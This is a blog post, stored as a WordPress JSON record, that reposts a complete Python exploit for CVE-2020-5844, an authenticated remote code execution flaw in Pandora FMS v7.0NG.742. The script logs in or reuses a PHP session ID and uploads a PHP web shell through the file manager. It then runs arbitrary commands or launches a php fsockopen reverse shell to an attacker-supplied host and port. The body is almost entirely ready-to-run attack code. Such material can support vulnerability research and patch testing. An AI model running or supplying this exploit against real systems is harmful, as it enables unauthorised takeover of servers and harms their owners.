{"id":25944,"date":"2022-06-20T07:00:02","date_gmt":"2022-06-20T03:00:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167503\/pandorafms70ng732-exec.txt"},"modified":"2022-06-26T08:52:40","modified_gmt":"2022-06-26T04:22:40","slug":"pandora-fms-7-0ng-742-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/pandora-fms-7-0ng-742-remote-code-execution\/","title":{"rendered":"Pandora FMS 7.0NG.742 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Pandora FMS v7.0NG.742 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 05\/20\/2022
\n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
\n# Vendor Homepage: https:\/\/pandorafms.com\/
\n# Software Link: https:\/\/sourceforge.net\/projects\/pandora\/files\/Pandora%20FMS%207.0NG\/742_FIX_PERL2020\/Tarball\/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
\n# Version: v7.0NG.742
\n# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)
\n# CVE: CVE-2020-5844
\n# Source: https:\/\/github.com\/UNICORDev\/exploit-CVE-2020-5844
\n# Description: index.php?sec=godmode\/extensions&sec2=extensions\/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.<\/p>\n

#!\/usr\/bin\/env python3<\/p>\n

# Imports
\ntry:
\nimport requests
\nexcept:
\nprint(f”ERRORED: RUN: pip install requests”)
\nexit()
\nimport sys
\nimport time
\nimport urllib.parse<\/p>\n

# Class for colors
\nclass color:
\nred = ‘\\033[91m’
\ngold = ‘\\033[93m’
\nblue = ‘\\033[36m’
\ngreen = ‘\\033[92m’
\nno = ‘\\033[0m’<\/p>\n

# Print UNICORD ASCII Art
\ndef UNICORD_ASCII():
\nprint(rf”””
\n{color.red} _ __,~~~{color.gold}\/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
\n{color.red} ,~~`( )_( )-\\| {color.blue}\/ \/ \/ \/ |\/ \/ _\/ ___\/ __ \\\/ _ \\\/ _ \\{color.no}
\n{color.red} |\/| `–. {color.blue}\/ \/_\/ \/ \/\/ \/\/ \/__\/ \/_\/ \/ , _\/ \/\/ \/{color.no}
\n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____\/_\/|_\/___\/\\___\/\\____\/_\/|_\/____\/{color.green}….{color.no}
\n“””)<\/p>\n

# Print exploit help menu
\ndef help():
\nprint(r”””UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) – Remote Code Execution<\/p>\n

Usage:
\npython3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
\npython3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
\npython3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]\npython3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]\npython3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]\npython3 exploit-CVE-2020-5844.py -h<\/p>\n

Options:
\n-t Target host and port. Provide target IP address and port.
\n-u Target username and password. Provide username and password to log in to Pandora FMS.
\n-p Target valid PHP session ID. No username or password needed. (Optional)
\n-s Reverse shell mode. Provide local IP address and port. (Optional)
\n-c Custom command mode. Provide command to execute. (Optional)
\n-w Web shell custom mode. Provide custom PHP file name. (Optional)
\n-h Show this help menu.
\n“””)
\nexit()<\/p>\n

# Pretty loading wheel
\ndef loading(spins):<\/p>\n

def spinning_cursor():
\nwhile True:
\nfor cursor in ‘|\/-\\\\’:
\nyield cursor<\/p>\n

spinner = spinning_cursor()
\nfor _ in range(spins):
\nsys.stdout.write(next(spinner))
\nsys.stdout.flush()
\ntime.sleep(0.1)
\nsys.stdout.write(‘\\b’)<\/p>\n

# Run the exploit
\ndef exploit(exploitMode, targetSess):<\/p>\n

UNICORD_ASCII()<\/p>\n

# Print initial variables
\nprint(f”{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) – Remote Code Execution{color.no}”)
\nprint(f”{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}”)
\nif targetSess is not None:
\nprint(f”{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}”)
\nelif targetUser is not None:
\nprint(f”{color.blue}USERNAME: {color.gold}{targetUser}{color.no}”)
\nprint(f”{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}”)<\/p>\n

if exploitMode == “command”:
\nprint(f”{color.blue}COMMAND: {color.gold}{command}{color.no}”)
\nif exploitMode == “web”:
\nprint(f”{color.blue}WEBFILE: {color.gold}{webName}{color.no}”)
\nif exploitMode == “shell”:
\nprint(f”{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}”)
\nprint(f”{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}”)
\nprint(f”{color.blue}WEBSITE: {color.gold}http:\/\/{targetIP}:{targetPort}\/pandora_console{color.no}”)<\/p>\n

loading(15)<\/p>\n

# If a PHPSESSID is not provided, grab one with valid username and password
\nif targetSess is None:
\ntry:
\ngetSession = requests.post(f”http:\/\/{targetIP}:{targetPort}\/pandora_console\/index.php?login=1″, data={“nick”: targetUser, “pass”: targetPass, “login_button”: “login”})
\ntargetSess = getSession.cookies.get(‘PHPSESSID’)
\nprint(f”{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}”)
\nif “login_move” in getSession.text:
\nprint(f”{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}”)
\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}”)
\nexit()<\/p>\n

# Set headers, parameters, and cookies for post request
\nheaders = {
\n‘Host’: f'{targetIP}’,
\n‘User-Agent’: ‘Mozilla\/5.0 (X11; Linux x86_64; rv:91.0) Gecko\/20100101 Firefox\/91.0’,
\n‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8’,
\n‘Accept-Language’: ‘en-US,en;q=0.5’,
\n‘Accept-Encoding’: ‘gzip, deflate’,
\n‘Content-Type’: ‘multipart\/form-data; boundary=—————————308045185511758964171231871874’,
\n‘Content-Length’: ‘1289’,
\n‘Connection’: ‘close’,
\n‘Referer’: f’http:\/\/{targetIP}:{targetPort}\/pandora_console\/index.php?sec=gsetup&sec2=godmode\/setup\/file_manager’,
\n‘Upgrade-Insecure-Requests’: ‘1’,
\n‘Sec-Fetch-Dest’: ‘document’,
\n‘Sec-Fetch-Mode’: ‘navigate’,
\n‘Sec-Fetch-Site’: ‘same-origin’,
\n‘Sec-Fetch-User’: ‘?1’
\n}
\nparams = (
\n(‘sec’, ‘gsetup’),
\n(‘sec2’, ‘godmode\/setup\/file_manager’)
\n)
\ncookies = {‘PHPSESSID’: targetSess}
\n# Basic PHP web shell with ‘cmd’ parameter
\ndata = f’—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”file”; filename=”{webName}”\\r\\nContent-Type: application\/x-php\\r\\n\\r\\n<?php system($_GET[\\’cmd\\’]);?>\\n\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”umask”\\r\\n\\r\\n\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”decompress_sent”\\r\\n\\r\\n1\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”go”\\r\\n\\r\\nGo\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”real_directory”\\r\\n\\r\\n\/var\/www\/pandora\/pandora_console\/images\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”directory”\\r\\n\\r\\nimages\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”hash”\\r\\n\\r\\n6427eed956c3b836eb0644629a183a9b\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”hash2″\\r\\n\\r\\n594175347dddf7a54cc03f6c6d0f04b4\\r\\n—————————–308045185511758964171231871874\\r\\nContent-Disposition: form-data; name=”upload_file_or_zip”\\r\\n\\r\\n1\\r\\n—————————–308045185511758964171231871874–\\r\\n’<\/p>\n

# Try to upload the PHP web shell to the server
\ntry:
\nresponse = requests.post(f’http:\/\/{targetIP}:{targetPort}\/pandora_console\/index.php’, headers=headers, params=params, cookies=cookies, data=data, verify=False)
\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}”)
\nexit()
\nstatusCode=response.status_code
\nif statusCode == 200:
\nprint(f”{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}”)
\nelse:
\nprint(f”{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}”)
\nexit()
\nloading(15)<\/p>\n

print(f”{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}”)
\nloading(15)<\/p>\n

# Print web shell location if in web shell mode
\nif exploitMode == “web”:
\nprint(f”{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}”)
\nprint(f”{color.blue}SUCCESS: {color.green}Web shell available at: http:\/\/{targetIP}:{targetPort}\/pandora_console\/images\/{webName}?cmd=whoami {color.no}\\n”)<\/p>\n

# Run custom command on web shell if in command mode
\nif exploitMode == “command”:
\nresponse = requests.get(f’http:\/\/{targetIP}:{targetPort}\/pandora_console\/images\/{webName}?cmd={urllib.parse.quote_plus(command)}’)
\nprint(f”{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\\n”)
\nprint(response.text)<\/p>\n

# Run reverse shell command if in reverse shell mode
\nif exploitMode == “shell”:
\nshell = f”php -r \\’$sock=fsockopen(\\”{localIP}\\”,{localPort});exec(\\”\/bin\/sh -i <&3 >&3 2>&3\\”);\\'”
\ntry:
\nrequests.get(f’http:\/\/{targetIP}:{targetPort}\/pandora_console\/images\/{webName}?cmd={urllib.parse.quote_plus(shell)}’,timeout=1)
\nprint(f”{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\\n”)
\nexcept:
\nprint(f”{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\\n”)<\/p>\n

exit()<\/p>\n

if __name__ == “__main__”:<\/p>\n

args = [‘-h’,’-t’,’-u’,’-p’,’-s’,’-c’,’-w’]\nmodes = {‘web’:’Web Shell Mode’,’command’:’Command Shell Mode’,’shell’:’Reverse Shell Mode’}<\/p>\n

# Initialize starting variables
\ntargetIP = None
\ntargetPort = None
\ntargetUser = None
\ntargetPass = None
\ntargetSess = None
\ncommand = None
\nlocalIP = None
\nlocalPort = None
\nwebName = “unicord.php” # Default web shell file name
\nexploitMode = “web” # Default to web shell mode<\/p>\n

# Print help if specified or if a target or authentication is not provided
\nif args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):
\nhelp()<\/p>\n

# Collect target IP and port from CLI
\nif args[1] in sys.argv:
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[1]) + 1]:
\nraise
\ntargetIP = sys.argv[sys.argv.index(args[1]) + 1]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide a target port! \\”-t <target-IP> <target-port>\\”{color.no}”)
\nexit()
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[1]) + 2]:
\nraise
\ntargetPort = sys.argv[sys.argv.index(args[1]) + 2]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide a target port! \\”-t <target-IP> <target-port>\\”{color.no}”)
\nexit()<\/p>\n

# Collect target username and password from CLI
\nif args[2] in sys.argv:
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[2]) + 1]:
\nraise
\ntargetUser = sys.argv[sys.argv.index(args[2]) + 1]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide both a username and password! \\”-u <username> <password>\\”{color.no}”)
\nexit()
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[2]) + 2]:
\nraise
\ntargetPass = sys.argv[sys.argv.index(args[2]) + 2]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide both a username and password! \\”-u <username> <password>\\”{color.no}”)
\nexit()<\/p>\n

# Collect PHPSESSID from CLI, if specified
\nif args[3] in sys.argv:
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[3]) + 1]:
\nraise
\ntargetSess = sys.argv[sys.argv.index(args[3]) + 1]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \\”-p <PHPSESSID>\\”{color.no}”)
\nexit()<\/p>\n

# Set reverse shell mode from CLI, if specified
\nif args[4] in sys.argv:
\nexploitMode = “shell”
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[4]) + 1]:
\nraise
\nlocalIP = sys.argv[sys.argv.index(args[4]) + 1]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \\”-s <local-IP> <local-port>\\”{color.no}”)
\nexit()
\ntry:
\nif “-” in sys.argv[sys.argv.index(args[4]) + 2]:
\nraise
\nlocalPort = sys.argv[sys.argv.index(args[4]) + 2]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \\”-s <local-IP> <local-port>\\”{color.no}”)
\nexit()
\nexploit(exploitMode,targetSess)<\/p>\n

# Set custom command mode from CLI, if specified
\nelif args[5] in sys.argv:
\nexploitMode = “command”
\ntry:
\nif sys.argv[sys.argv.index(args[5]) + 1] in args:
\nraise
\ncommand = sys.argv[sys.argv.index(args[5]) + 1]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide a custom command! \\”-c <command>\\”{color.no}”)
\nexit()
\nexploit(exploitMode,targetSess)<\/p>\n

# Set web shell mode from CLI, if specified
\nelif args[6] in sys.argv:
\nexploitMode = “web”
\ntry:
\nif sys.argv[sys.argv.index(args[6]) + 1] in args:
\nraise
\nif “.php” not in sys.argv[sys.argv.index(args[6]) + 1]:
\nwebName = sys.argv[sys.argv.index(args[6]) + 1] + “.php”
\nelse:
\nwebName = sys.argv[sys.argv.index(args[6]) + 1]\nexcept:
\nprint(f”{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \\”-c <name.php>\\”{color.no}”)
\nexit()
\nexploit(exploitMode,targetSess)<\/p>\n

# Run with default web shell mode if no mode is specified
\nelse:
\nexploit(exploitMode,targetSess)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Pandora FMS v7.0NG.742 – Remote Code Execution (RCE) (Authenticated) # Date: 05\/20\/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https:\/\/pandorafms.com\/ # Software Link: https:\/\/sourceforge.net\/projects\/pandora\/files\/Pandora%20FMS%207.0NG\/742_FIX_PERL2020\/Tarball\/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz # Version: v7.0NG.742 # Tested on: Pandora FMS v7.0NG.742 (Ubuntu) # CVE: CVE-2020-5844 # Source: https:\/\/github.com\/UNICORDev\/exploit-CVE-2020-5844 # Description: index.php?sec=godmode\/extensions&sec2=extensions\/files_repo in Pandora FMS v7.0 NG allows …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25944","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25944"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25944\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25944"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25944"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}